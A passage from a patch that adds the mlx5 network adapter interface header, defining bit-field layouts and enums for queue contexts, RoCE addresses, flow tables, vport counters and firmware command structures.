reserved_26[0x8]; + u8 xrcd[0x18]; + + u8 reserved_27[0x8]; + u8 cqn_rcv[0x18]; + + u8 dbr_addr[0x40]; + + u8 q_key[0x20]; + + u8 reserved_28[0x5]; + u8 rq_type[0x3]; + u8 srqn_rmpn[0x18]; + + u8 reserved_29[0x8]; + u8 rmsn[0x18]; + + u8 hw_sq_wqebb_counter[0x10]; + u8 sw_sq_wqebb_counter[0x10]; + + u8 hw_rq_counter[0x20]; + + u8 sw_rq_counter[0x20]; + + u8 reserved_30[0x20]; + + u8 reserved_31[0xf]; + u8 cgs[0x1]; + u8 cs_req[0x8]; + u8 cs_res[0x8]; + + u8 dc_access_key[0x40]; + + u8 reserved_32[0xc0]; +}; + +struct mlx5_ifc_roce_addr_layout_bits { + u8 source_l3_address[16][0x8]; + + u8 reserved_0[0x3]; + u8 vlan_valid[0x1]; + u8 vlan_id[0xc]; + u8 source_mac_47_32[0x10]; + + u8 source_mac_31_0[0x20]; + + u8 reserved_1[0x14]; + u8 roce_l3_type[0x4]; + u8 roce_version[0x8]; + + u8 reserved_2[0x20]; +}; + +union mlx5_ifc_hca_cap_union_bits { + struct mlx5_ifc_cmd_hca_cap_bits cmd_hca_cap; + struct mlx5_ifc_odp_cap_bits odp_cap; + struct mlx5_ifc_atomic_caps_bits atomic_caps; + struct mlx5_ifc_roce_cap_bits roce_cap; + struct mlx5_ifc_per_protocol_networking_offload_caps_bits per_protocol_networking_offload_caps; + struct mlx5_ifc_flow_table_nic_cap_bits flow_table_nic_cap; + u8 reserved_0[0x8000]; +}; + +enum { + MLX5_FLOW_CONTEXT_ACTION_ALLOW = 0x1, + MLX5_FLOW_CONTEXT_ACTION_DROP = 0x2, + MLX5_FLOW_CONTEXT_ACTION_FWD_DEST = 0x4, +}; + +struct mlx5_ifc_flow_context_bits { + u8 reserved_0[0x20]; + + u8 group_id[0x20]; + + u8 reserved_1[0x8]; + u8 flow_tag[0x18]; + + u8 reserved_2[0x10]; + u8 action[0x10]; + + u8 reserved_3[0x8]; + u8 destination_list_size[0x18]; + + u8 reserved_4[0x160]; + + struct mlx5_ifc_fte_match_param_bits match_value; + + u8 reserved_5[0x600]; + + struct mlx5_ifc_dest_format_struct_bits destination[0]; +}; + +enum { + MLX5_XRC_SRQC_STATE_GOOD = 0x0, + MLX5_XRC_SRQC_STATE_ERROR = 0x1, +}; + +struct mlx5_ifc_xrc_srqc_bits { + u8 state[0x4]; + u8 log_xrc_srq_size[0x4]; + u8 reserved_0[0x18]; + + u8 wq_signature[0x1]; + u8 cont_srq[0x1]; + u8 reserved_1[0x1]; + u8 rlky[0x1]; + u8 basic_cyclic_rcv_wqe[0x1]; + u8 log_rq_stride[0x3]; + u8 xrcd[0x18]; + + u8 page_offset[0x6]; + u8 reserved_2[0x2]; + u8 cqn[0x18]; + + u8 reserved_3[0x20]; + + u8 user_index_equal_xrc_srqn[0x1]; + u8 reserved_4[0x1]; + u8 log_page_size[0x6]; + u8 user_index[0x18]; + 
+ u8 reserved_5[0x20]; + + u8 reserved_6[0x8]; + u8 pd[0x18]; + + u8 lwm[0x10]; + u8 wqe_cnt[0x10]; + + u8 reserved_7[0x40]; + + u8 db_record_addr_h[0x20]; + + u8 db_record_addr_l[0x1e]; + u8 reserved_8[0x2]; + + u8 reserved_9[0x80]; +}; + +struct mlx5_ifc_traffic_counter_bits { + u8 packets[0x40]; + + u8 octets[0x40]; +}; + +struct mlx5_ifc_tisc_bits { + u8 reserved_0[0xc]; + u8 prio[0x4]; + u8 reserved_1[0x10]; + + u8 reserved_2[0x100]; + + u8 reserved_3[0x8]; + u8 transport_domain[0x18]; + + u8 reserved_4[0x3c0]; +}; + +enum { + MLX5_TIRC_DISP_TYPE_DIRECT = 0x0, + MLX5_TIRC_DISP_TYPE_INDIRECT = 0x1, +}; + +enum { + MLX5_TIRC_LRO_ENABLE_MASK_IPV4_LRO = 0x1, + MLX5_TIRC_LRO_ENABLE_MASK_IPV6_LRO = 0x2, +}; + +enum { + MLX5_TIRC_RX_HASH_FN_HASH_NONE = 0x0, + MLX5_TIRC_RX_HASH_FN_HASH_INVERTED_XOR8 = 0x1, + MLX5_TIRC_RX_HASH_FN_HASH_TOEPLITZ = 0x2, +}; + +enum { + MLX5_TIRC_SELF_LB_BLOCK_BLOCK_UNICAST_ = 0x1, + MLX5_TIRC_SELF_LB_BLOCK_BLOCK_MULTICAST_ = 0x2, +}; + +struct mlx5_ifc_tirc_bits { + u8 reserved_0[0x20]; + + u8 disp_type[0x4]; + u8 reserved_1[0x1c]; + + u8 reserved_2[0x40]; + + u8 reserved_3[0x4]; + u8 lro_timeout_period_usecs[0x10]; + u8 lro_enable_mask[0x4]; + u8 lro_max_ip_payload_size[0x8]; + + u8 reserved_4[0x40]; + + u8 reserved_5[0x8]; + u8 inline_rqn[0x18]; + + u8 rx_hash_symmetric[0x1]; + u8 reserved_6[0x1]; + u8 tunneled_offload_en[0x1]; + u8 reserved_7[0x5]; + u8 indirect_table[0x18]; + + u8 rx_hash_fn[0x4]; + u8 reserved_8[0x2]; + u8 self_lb_block[0x2]; + u8 transport_domain[0x18]; + + u8 rx_hash_toeplitz_key[10][0x20]; + + struct mlx5_ifc_rx_hash_field_select_bits rx_hash_field_selector_outer; + + struct mlx5_ifc_rx_hash_field_select_bits rx_hash_field_selector_inner; + + u8 reserved_9[0x4c0]; +}; + +enum { + MLX5_SRQC_STATE_GOOD = 0x0, + MLX5_SRQC_STATE_ERROR = 0x1, +}; + +struct mlx5_ifc_srqc_bits { + u8 state[0x4]; + u8 log_srq_size[0x4]; + u8 reserved_0[0x18]; + + u8 wq_signature[0x1]; + u8 cont_srq[0x1]; + u8 reserved_1[0x1]; + u8 rlky[0x1]; + u8 reserved_2[0x1]; + u8 log_rq_stride[0x3]; + u8 xrcd[0x18]; + + u8 page_offset[0x6]; + u8 reserved_3[0x2]; + u8 cqn[0x18]; + + u8 reserved_4[0x20]; + + u8 reserved_5[0x2]; + u8 log_page_size[0x6]; + u8 reserved_6[0x18]; + + u8 reserved_7[0x20]; + + u8 reserved_8[0x8]; + u8 pd[0x18]; + + u8 lwm[0x10]; + u8 wqe_cnt[0x10]; + + u8 reserved_9[0x40]; + + u8 db_record_addr_h[0x20]; + + u8 db_record_addr_l[0x1e]; + u8 reserved_10[0x2]; + + u8 reserved_11[0x80]; +}; + +enum { + MLX5_SQC_STATE_RST = 0x0, + MLX5_SQC_STATE_RDY = 0x1, + MLX5_SQC_STATE_ERR = 0x3, +}; + +struct mlx5_ifc_sqc_bits { + u8 rlky[0x1]; + u8 cd_master[0x1]; + u8 fre[0x1]; + u8 flush_in_error_en[0x1]; + u8 reserved_0[0x4]; + u8 state[0x4]; + u8 reserved_1[0x14]; + + u8 reserved_2[0x8]; + u8 user_index[0x18]; + + u8 reserved_3[0x8]; + u8 cqn[0x18]; + + u8 reserved_4[0xa0]; + + u8 tis_lst_sz[0x10]; + u8 reserved_5[0x10]; + + u8 reserved_6[0x40]; + + u8 reserved_7[0x8]; + u8 tis_num_0[0x18]; + + struct mlx5_ifc_wq_bits wq; +}; + +struct mlx5_ifc_rqtc_bits { + u8 reserved_0[0xa0]; + + u8 reserved_1[0x10]; + u8 rqt_max_size[0x10]; + + u8 reserved_2[0x10]; + u8 rqt_actual_size[0x10]; + + u8 reserved_3[0x6a0]; + + struct mlx5_ifc_rq_num_bits rq_num[0]; +}; + +enum { + MLX5_RQC_MEM_RQ_TYPE_MEMORY_RQ_INLINE = 0x0, + MLX5_RQC_MEM_RQ_TYPE_MEMORY_RQ_RMP = 0x1, +}; + +enum { + MLX5_RQC_STATE_RST = 0x0, + MLX5_RQC_STATE_RDY = 0x1, + MLX5_RQC_STATE_ERR = 0x3, +}; + +struct mlx5_ifc_rqc_bits { + u8 rlky[0x1]; + u8 reserved_0[0x2]; + u8 vsd[0x1]; + u8 mem_rq_type[0x4]; + u8 
state[0x4]; + u8 reserved_1[0x1]; + u8 flush_in_error_en[0x1]; + u8 reserved_2[0x12]; + + u8 reserved_3[0x8]; + u8 user_index[0x18]; + + u8 reserved_4[0x8]; + u8 cqn[0x18]; + + u8 counter_set_id[0x8]; + u8 reserved_5[0x18]; + + u8 reserved_6[0x8]; + u8 rmpn[0x18]; + + u8 reserved_7[0xe0]; + + struct mlx5_ifc_wq_bits wq; +}; + +enum { + MLX5_RMPC_STATE_RDY = 0x1, + MLX5_RMPC_STATE_ERR = 0x3, +}; + +struct mlx5_ifc_rmpc_bits { + u8 reserved_0[0x8]; + u8 state[0x4]; + u8 reserved_1[0x14]; + + u8 basic_cyclic_rcv_wqe[0x1]; + u8 reserved_2[0x1f]; + + u8 reserved_3[0x140]; + + struct mlx5_ifc_wq_bits wq; +}; + +enum { + MLX5_NIC_VPORT_CONTEXT_ALLOWED_LIST_TYPE_CURRENT_UC_MAC_ADDRESS = 0x0, +}; + +struct mlx5_ifc_nic_vport_context_bits { + u8 reserved_0[0x1f]; + u8 roce_en[0x1]; + + u8 reserved_1[0x760]; + + u8 reserved_2[0x5]; + u8 allowed_list_type[0x3]; + u8 reserved_3[0xc]; + u8 allowed_list_size[0xc]; + + struct mlx5_ifc_mac_address_layout_bits permanent_address; + + u8 reserved_4[0x20]; + + u8 current_uc_mac_address[0][0x40]; +}; + +enum { + MLX5_MKC_ACCESS_MODE_PA = 0x0, + MLX5_MKC_ACCESS_MODE_MTT = 0x1, + MLX5_MKC_ACCESS_MODE_KLMS = 0x2, +}; + +struct mlx5_ifc_mkc_bits { + u8 reserved_0[0x1]; + u8 free[0x1]; + u8 reserved_1[0xd]; + u8 small_fence_on_rdma_read_response[0x1]; + u8 umr_en[0x1]; + u8 a[0x1]; + u8 rw[0x1]; + u8 rr[0x1]; + u8 lw[0x1]; + u8 lr[0x1]; + u8 access_mode[0x2]; + u8 reserved_2[0x8]; + + u8 qpn[0x18]; + u8 mkey_7_0[0x8]; + + u8 reserved_3[0x20]; + + u8 length64[0x1]; + u8 bsf_en[0x1]; + u8 sync_umr[0x1]; + u8 reserved_4[0x2]; + u8 expected_sigerr_count[0x1]; + u8 reserved_5[0x1]; + u8 en_rinval[0x1]; + u8 pd[0x18]; + + u8 start_addr[0x40]; + + u8 len[0x40]; + + u8 bsf_octword_size[0x20]; + + u8 reserved_6[0x80]; + + u8 translations_octword_size[0x20]; + + u8 reserved_7[0x1b]; + u8 log_page_size[0x5]; + + u8 reserved_8[0x20]; +}; + +struct mlx5_ifc_pkey_bits { + u8 reserved_0[0x10]; + u8 pkey[0x10]; +}; + +struct mlx5_ifc_array128_auto_bits { + u8 array128_auto[16][0x8]; +}; + +struct mlx5_ifc_hca_vport_context_bits { + u8 field_select[0x20]; + + u8 reserved_0[0xe0]; + + u8 sm_virt_aware[0x1]; + u8 has_smi[0x1]; + u8 has_raw[0x1]; + u8 grh_required[0x1]; + u8 reserved_1[0x10]; + u8 port_state_policy[0x4]; + u8 phy_port_state[0x4]; + u8 vport_state[0x4]; + + u8 reserved_2[0x60]; + + u8 port_guid[0x40]; + + u8 node_guid[0x40]; + + u8 cap_mask1[0x20]; + + u8 cap_mask1_field_select[0x20]; + + u8 cap_mask2[0x20]; + + u8 cap_mask2_field_select[0x20]; + + u8 reserved_3[0x80]; + + u8 lid[0x10]; + u8 reserved_4[0x4]; + u8 init_type_reply[0x4]; + u8 lmc[0x3]; + u8 subnet_timeout[0x5]; + + u8 sm_lid[0x10]; + u8 sm_sl[0x4]; + u8 reserved_5[0xc]; + + u8 qkey_violation_counter[0x10]; + u8 pkey_violation_counter[0x10]; + + u8 reserved_6[0xca0]; +}; + +enum { + MLX5_EQC_STATUS_OK = 0x0, + MLX5_EQC_STATUS_EQ_WRITE_FAILURE = 0xa, +}; + +enum { + MLX5_EQC_ST_ARMED = 0x9, + MLX5_EQC_ST_FIRED = 0xa, +}; + +struct mlx5_ifc_eqc_bits { + u8 status[0x4]; + u8 reserved_0[0x9]; + u8 ec[0x1]; + u8 oi[0x1]; + u8 reserved_1[0x5]; + u8 st[0x4]; + u8 reserved_2[0x8]; + + u8 reserved_3[0x20]; + + u8 reserved_4[0x14]; + u8 page_offset[0x6]; + u8 reserved_5[0x6]; + + u8 reserved_6[0x3]; + u8 log_eq_size[0x5]; + u8 uar_page[0x18]; + + u8 reserved_7[0x20]; + + u8 reserved_8[0x18]; + u8 intr[0x8]; + + u8 reserved_9[0x3]; + u8 log_page_size[0x5]; + u8 reserved_10[0x18]; + + u8 reserved_11[0x60]; + + u8 reserved_12[0x8]; + u8 consumer_counter[0x18]; + + u8 reserved_13[0x8]; + u8 producer_counter[0x18]; + + u8 
reserved_14[0x80]; +}; + +enum { + MLX5_DCTC_STATE_ACTIVE = 0x0, + MLX5_DCTC_STATE_DRAINING = 0x1, + MLX5_DCTC_STATE_DRAINED = 0x2, +}; + +enum { + MLX5_DCTC_CS_RES_DISABLE = 0x0, + MLX5_DCTC_CS_RES_NA = 0x1, + MLX5_DCTC_CS_RES_UP_TO_64B = 0x2, +}; + +enum { + MLX5_DCTC_MTU_256_BYTES = 0x1, + MLX5_DCTC_MTU_512_BYTES = 0x2, + MLX5_DCTC_MTU_1K_BYTES = 0x3, + MLX5_DCTC_MTU_2K_BYTES = 0x4, + MLX5_DCTC_MTU_4K_BYTES = 0x5, +}; + +struct mlx5_ifc_dctc_bits { + u8 reserved_0[0x4]; + u8 state[0x4]; + u8 reserved_1[0x18]; + + u8 reserved_2[0x8]; + u8 user_index[0x18]; + + u8 reserved_3[0x8]; + u8 cqn[0x18]; + + u8 counter_set_id[0x8]; + u8 atomic_mode[0x4]; + u8 rre[0x1]; + u8 rwe[0x1]; + u8 rae[0x1]; + u8 atomic_like_write_en[0x1]; + u8 latency_sensitive[0x1]; + u8 rlky[0x1]; + u8 free_ar[0x1]; + u8 reserved_4[0xd]; + + u8 reserved_5[0x8]; + u8 cs_res[0x8]; + u8 reserved_6[0x3]; + u8 min_rnr_nak[0x5]; + u8 reserved_7[0x8]; + + u8 reserved_8[0x8]; + u8 srqn[0x18]; + + u8 reserved_9[0x8]; + u8 pd[0x18]; + + u8 tclass[0x8]; + u8 reserved_10[0x4]; + u8 flow_label[0x14]; + + u8 dc_access_key[0x40]; + + u8 reserved_11[0x5]; + u8 mtu[0x3]; + u8 port[0x8]; + u8 pkey_index[0x10]; + + u8 reserved_12[0x8]; + u8 my_addr_index[0x8]; + u8 reserved_13[0x8]; + u8 hop_limit[0x8]; + + u8 dc_access_key_violation_count[0x20]; + + u8 reserved_14[0x14]; + u8 dei_cfi[0x1]; + u8 eth_prio[0x3]; + u8 ecn[0x2]; + u8 dscp[0x6]; + + u8 reserved_15[0x40]; +}; + +enum { + MLX5_CQC_STATUS_OK = 0x0, + MLX5_CQC_STATUS_CQ_OVERFLOW = 0x9, + MLX5_CQC_STATUS_CQ_WRITE_FAIL = 0xa, +}; + +enum { + MLX5_CQC_CQE_SZ_64_BYTES = 0x0, + MLX5_CQC_CQE_SZ_128_BYTES = 0x1, +}; + +enum { + MLX5_CQC_ST_SOLICITED_NOTIFICATION_REQUEST_ARMED = 0x6, + MLX5_CQC_ST_NOTIFICATION_REQUEST_ARMED = 0x9, + MLX5_CQC_ST_FIRED = 0xa, +}; + +struct mlx5_ifc_cqc_bits { + u8 status[0x4]; + u8 reserved_0[0x4]; + u8 cqe_sz[0x3]; + u8 cc[0x1]; + u8 reserved_1[0x1]; + u8 scqe_break_moderation_en[0x1]; + u8 oi[0x1]; + u8 reserved_2[0x2]; + u8 cqe_zip_en[0x1]; + u8 mini_cqe_res_format[0x2]; + u8 st[0x4]; + u8 reserved_3[0x8]; + + u8 reserved_4[0x20]; + + u8 reserved_5[0x14]; + u8 page_offset[0x6]; + u8 reserved_6[0x6]; + + u8 reserved_7[0x3]; + u8 log_cq_size[0x5]; + u8 uar_page[0x18]; + + u8 reserved_8[0x4]; + u8 cq_period[0xc]; + u8 cq_max_count[0x10]; + + u8 reserved_9[0x18]; + u8 c_eqn[0x8]; + + u8 reserved_10[0x3]; + u8 log_page_size[0x5]; + u8 reserved_11[0x18]; + + u8 reserved_12[0x20]; + + u8 reserved_13[0x8]; + u8 last_notified_index[0x18]; + + u8 reserved_14[0x8]; + u8 last_solicit_index[0x18]; + + u8 reserved_15[0x8]; + u8 consumer_counter[0x18]; + + u8 reserved_16[0x8]; + u8 producer_counter[0x18]; + + u8 reserved_17[0x40]; + + u8 dbr_addr[0x40]; +}; + +union mlx5_ifc_cong_control_roce_ecn_auto_bits { + struct mlx5_ifc_cong_control_802_1qau_rp_bits cong_control_802_1qau_rp; + struct mlx5_ifc_cong_control_r_roce_ecn_rp_bits cong_control_r_roce_ecn_rp; + struct mlx5_ifc_cong_control_r_roce_ecn_np_bits cong_control_r_roce_ecn_np; + u8 reserved_0[0x800]; +}; + +struct mlx5_ifc_query_adapter_param_block_bits { + u8 reserved_0[0xe0]; + + u8 reserved_1[0x10]; + u8 vsd_vendor_id[0x10]; + + u8 vsd[208][0x8]; + + u8 vsd_contd_psid[16][0x8]; +}; + +union mlx5_ifc_modify_field_select_resize_field_select_auto_bits { + struct mlx5_ifc_modify_field_select_bits modify_field_select; + struct mlx5_ifc_resize_field_select_bits resize_field_select; + u8 reserved_0[0x20]; +}; + +union mlx5_ifc_field_select_802_1_r_roce_auto_bits { + struct mlx5_ifc_field_select_802_1qau_rp_bits 
field_select_802_1qau_rp; + struct mlx5_ifc_field_select_r_roce_rp_bits field_select_r_roce_rp; + struct mlx5_ifc_field_select_r_roce_np_bits field_select_r_roce_np; + u8 reserved_0[0x20]; +}; + +union mlx5_ifc_eth_cntrs_grp_data_layout_auto_bits { + struct mlx5_ifc_eth_802_3_cntrs_grp_data_layout_bits eth_802_3_cntrs_grp_data_layout; + struct mlx5_ifc_eth_2863_cntrs_grp_data_layout_bits eth_2863_cntrs_grp_data_layout; + struct mlx5_ifc_eth_2819_cntrs_grp_data_layout_bits eth_2819_cntrs_grp_data_layout; + struct mlx5_ifc_eth_3635_cntrs_grp_data_layout_bits eth_3635_cntrs_grp_data_layout; + struct mlx5_ifc_eth_extended_cntrs_grp_data_layout_bits eth_extended_cntrs_grp_data_layout; + struct mlx5_ifc_eth_per_prio_grp_data_layout_bits eth_per_prio_grp_data_layout; + struct mlx5_ifc_eth_per_traffic_grp_data_layout_bits eth_per_traffic_grp_data_layout; + struct mlx5_ifc_phys_layer_cntrs_bits phys_layer_cntrs; + u8 reserved_0[0x7c0]; +}; + +union mlx5_ifc_event_auto_bits { + struct mlx5_ifc_comp_event_bits comp_event; + struct mlx5_ifc_dct_events_bits dct_events; + struct mlx5_ifc_qp_events_bits qp_events; + struct mlx5_ifc_wqe_associated_page_fault_event_bits wqe_associated_page_fault_event; + struct mlx5_ifc_rdma_page_fault_event_bits rdma_page_fault_event; + struct mlx5_ifc_cq_error_bits cq_error; + struct mlx5_ifc_dropped_packet_logged_bits dropped_packet_logged; + struct mlx5_ifc_port_state_change_event_bits port_state_change_event; + struct mlx5_ifc_gpio_event_bits gpio_event; + struct mlx5_ifc_db_bf_congestion_event_bits db_bf_congestion_event; + struct mlx5_ifc_stall_vl_event_bits stall_vl_event; + struct mlx5_ifc_cmd_inter_comp_event_bits cmd_inter_comp_event; + u8 reserved_0[0xe0]; +}; + +struct mlx5_ifc_health_buffer_bits { + u8 reserved_0[0x100]; + + u8 assert_existptr[0x20]; + + u8 assert_callra[0x20]; + + u8 reserved_1[0x40]; + + u8 fw_version[0x20]; + + u8 hw_id[0x20]; + + u8 reserved_2[0x20]; + + u8 irisc_index[0x8]; + u8 synd[0x8]; + u8 ext_synd[0x10]; +}; + +struct mlx5_ifc_register_loopback_control_bits { + u8 no_lb[0x1]; + u8 reserved_0[0x7]; + u8 port[0x8]; + u8 reserved_1[0x10]; + + u8 reserved_2[0x60]; +}; + +struct mlx5_ifc_teardown_hca_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +enum { + MLX5_TEARDOWN_HCA_IN_PROFILE_GRACEFUL_CLOSE = 0x0, + MLX5_TEARDOWN_HCA_IN_PROFILE_PANIC_CLOSE = 0x1, +}; + +struct mlx5_ifc_teardown_hca_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x10]; + u8 profile[0x10]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_sqerr2rts_qp_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_sqerr2rts_qp_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 qpn[0x18]; + + u8 reserved_3[0x20]; + + u8 opt_param_mask[0x20]; + + u8 reserved_4[0x20]; + + struct mlx5_ifc_qpc_bits qpc; + + u8 reserved_5[0x80]; +}; + +struct mlx5_ifc_sqd2rts_qp_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_sqd2rts_qp_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 qpn[0x18]; + + u8 reserved_3[0x20]; + + u8 opt_param_mask[0x20]; + + u8 reserved_4[0x20]; + + struct mlx5_ifc_qpc_bits qpc; + + u8 reserved_5[0x80]; +}; + +struct mlx5_ifc_set_roce_address_out_bits { + u8 
status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_set_roce_address_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 roce_address_index[0x10]; + u8 reserved_2[0x10]; + + u8 reserved_3[0x20]; + + struct mlx5_ifc_roce_addr_layout_bits roce_address; +}; + +struct mlx5_ifc_set_mad_demux_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +enum { + MLX5_SET_MAD_DEMUX_IN_DEMUX_MODE_PASS_ALL = 0x0, + MLX5_SET_MAD_DEMUX_IN_DEMUX_MODE_SELECTIVE = 0x2, +}; + +struct mlx5_ifc_set_mad_demux_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x20]; + + u8 reserved_3[0x6]; + u8 demux_mode[0x2]; + u8 reserved_4[0x18]; +}; + +struct mlx5_ifc_set_l2_table_entry_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_set_l2_table_entry_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x60]; + + u8 reserved_3[0x8]; + u8 table_index[0x18]; + + u8 reserved_4[0x20]; + + u8 reserved_5[0x13]; + u8 vlan_valid[0x1]; + u8 vlan[0xc]; + + struct mlx5_ifc_mac_address_layout_bits mac_address; + + u8 reserved_6[0xc0]; +}; + +struct mlx5_ifc_set_issi_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_set_issi_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x10]; + u8 current_issi[0x10]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_set_hca_cap_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_set_hca_cap_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; + + union mlx5_ifc_hca_cap_union_bits capability; +}; + +struct mlx5_ifc_set_fte_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_set_fte_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; + + u8 table_type[0x8]; + u8 reserved_3[0x18]; + + u8 reserved_4[0x8]; + u8 table_id[0x18]; + + u8 reserved_5[0x40]; + + u8 flow_index[0x20]; + + u8 reserved_6[0xe0]; + + struct mlx5_ifc_flow_context_bits flow_context; +}; + +struct mlx5_ifc_rts2rts_qp_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_rts2rts_qp_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 qpn[0x18]; + + u8 reserved_3[0x20]; + + u8 opt_param_mask[0x20]; + + u8 reserved_4[0x20]; + + struct mlx5_ifc_qpc_bits qpc; + + u8 reserved_5[0x80]; +}; + +struct mlx5_ifc_rtr2rts_qp_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_rtr2rts_qp_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 qpn[0x18]; + + u8 reserved_3[0x20]; + + u8 opt_param_mask[0x20]; + + u8 reserved_4[0x20]; + + struct mlx5_ifc_qpc_bits qpc; + + u8 reserved_5[0x80]; +}; + +struct mlx5_ifc_rst2init_qp_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 
reserved_1[0x40]; +}; + +struct mlx5_ifc_rst2init_qp_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 qpn[0x18]; + + u8 reserved_3[0x20]; + + u8 opt_param_mask[0x20]; + + u8 reserved_4[0x20]; + + struct mlx5_ifc_qpc_bits qpc; + + u8 reserved_5[0x80]; +}; + +struct mlx5_ifc_query_xrc_srq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + struct mlx5_ifc_xrc_srqc_bits xrc_srq_context_entry; + + u8 reserved_2[0x600]; + + u8 pas[0][0x40]; +}; + +struct mlx5_ifc_query_xrc_srq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 xrc_srqn[0x18]; + + u8 reserved_3[0x20]; +}; + +enum { + MLX5_QUERY_VPORT_STATE_OUT_STATE_DOWN = 0x0, + MLX5_QUERY_VPORT_STATE_OUT_STATE_UP = 0x1, +}; + +struct mlx5_ifc_query_vport_state_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x20]; + + u8 reserved_2[0x18]; + u8 admin_state[0x4]; + u8 state[0x4]; +}; + +enum { + MLX5_QUERY_VPORT_STATE_IN_OP_MOD_VNIC_VPORT = 0x0, +}; + +struct mlx5_ifc_query_vport_state_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 other_vport[0x1]; + u8 reserved_2[0xf]; + u8 vport_number[0x10]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_query_vport_counter_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + struct mlx5_ifc_traffic_counter_bits received_errors; + + struct mlx5_ifc_traffic_counter_bits transmit_errors; + + struct mlx5_ifc_traffic_counter_bits received_ib_unicast; + + struct mlx5_ifc_traffic_counter_bits transmitted_ib_unicast; + + struct mlx5_ifc_traffic_counter_bits received_ib_multicast; + + struct mlx5_ifc_traffic_counter_bits transmitted_ib_multicast; + + struct mlx5_ifc_traffic_counter_bits received_eth_broadcast; + + struct mlx5_ifc_traffic_counter_bits transmitted_eth_broadcast; + + struct mlx5_ifc_traffic_counter_bits received_eth_unicast; + + struct mlx5_ifc_traffic_counter_bits transmitted_eth_unicast; + + struct mlx5_ifc_traffic_counter_bits received_eth_multicast; + + struct mlx5_ifc_traffic_counter_bits transmitted_eth_multicast; + + u8 reserved_2[0xa00]; +}; + +enum { + MLX5_QUERY_VPORT_COUNTER_IN_OP_MOD_VPORT_COUNTERS = 0x0, +}; + +struct mlx5_ifc_query_vport_counter_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 other_vport[0x1]; + u8 reserved_2[0xf]; + u8 vport_number[0x10]; + + u8 reserved_3[0x60]; + + u8 clear[0x1]; + u8 reserved_4[0x1f]; + + u8 reserved_5[0x20]; +}; + +struct mlx5_ifc_query_tis_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + struct mlx5_ifc_tisc_bits tis_context; +}; + +struct mlx5_ifc_query_tis_in_bits { + u8 opcode[0x10]; + u8 